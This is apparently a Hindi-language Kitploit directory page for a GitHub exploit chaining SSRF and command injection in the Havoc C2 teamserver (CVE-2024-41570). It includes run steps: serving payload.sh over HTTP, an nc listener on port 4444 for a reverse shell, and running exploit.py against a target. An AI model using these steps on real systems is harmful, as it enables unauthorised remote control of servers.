Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-41570-Havoc-C2-RCE — यह Havoc C2 फ्रेमवर्क में एक Chained RCE है, जिसमें github.com/chebuya और github.com/IncludeSecurity pocs का उपयोग किया गया है। | Kitploit
उपकरण/GitHubGitHub/leo-mitch/cve-2024-41570-havoc-c2-rce
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंग
GitHubleo-mitch/cve-2024-41570-havoc-c2-rce

CVE-2024-41570-Havoc-C2-RCE

यह Havoc C2 फ्रेमवर्क में एक Chained RCE है, जिसमें github.com/chebuya और github.com/IncludeSecurity pocs का उपयोग किया गया है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
31 साल पहलेअभी तक समीक्षित नहीं

Havoc-C2-RCE (CVE-2024-41570)

यह Havoc C2 फ्रेमवर्क में एक चेन्ड RCE (CVE-2024-41570) है।

कमांड इंजेक्शन: Havoc कमांड इंजेक्शन के प्रति संवेदनशील है, जो एक प्रमाणित उपयोगकर्ता को Teamserver पर कमांड निष्पादित करने में सक्षम बनाता है। यह संस्करण 0.3 से नवीनतम रिलीज़ 0.6 तक प्रभावित करता है। Havoc की डिफ़ॉल्ट प्रोफ़ाइल में हार्डकोडेड पासवर्ड होते हैं, इसलिए एक C2 ऑपरेटर जो सार्वजनिक नेटवर्क पर डिफ़ॉल्ट प्रोफ़ाइल का उपयोग करने में लापरवाही करता है, उसका तुरंत शोषण किया जा सकता है।

SSRF: इस कमजोरी का शोषण एक डेमन एजेंट पंजीकरण और चेक-इन्स को स्पूफ करके teamserver पर TCP सॉकेट खोलने और उससे डेटा पढ़ने/लिखने के लिए किया जाता है। यह हमलावरों को teamserver के मूल IP पते लीक करने और बहुत कुछ करने की अनुमति देता है।

चेन: प्रमाणित कमांड इंजेक्शन पेलोड पहुंचाने के लिए SSRF का दुरुपयोग करना।

उपयोग कैसे करें

2025-01-19 20-01-34

root@kitploit:~
1. Modify the IP, USER and PASSWORD in the exploit.py file.
2. Modify IP in payload.sh

-> python3 -m venv myenv && source myenv/bin/activate
-> pip3 install -r requirements.txt
-> chmox +x payload.sh
-> python3 -m http.server (On another terminal)
-> nc -lvnp 4444 (On another terminal)

# Run the exploit
(myenv) -> python3 exploit.py -t https://site.com -i 0.0.0.0 -p 12345

श्रेय: @chebuya और @Hyperreality

टूल डाउनलोड करें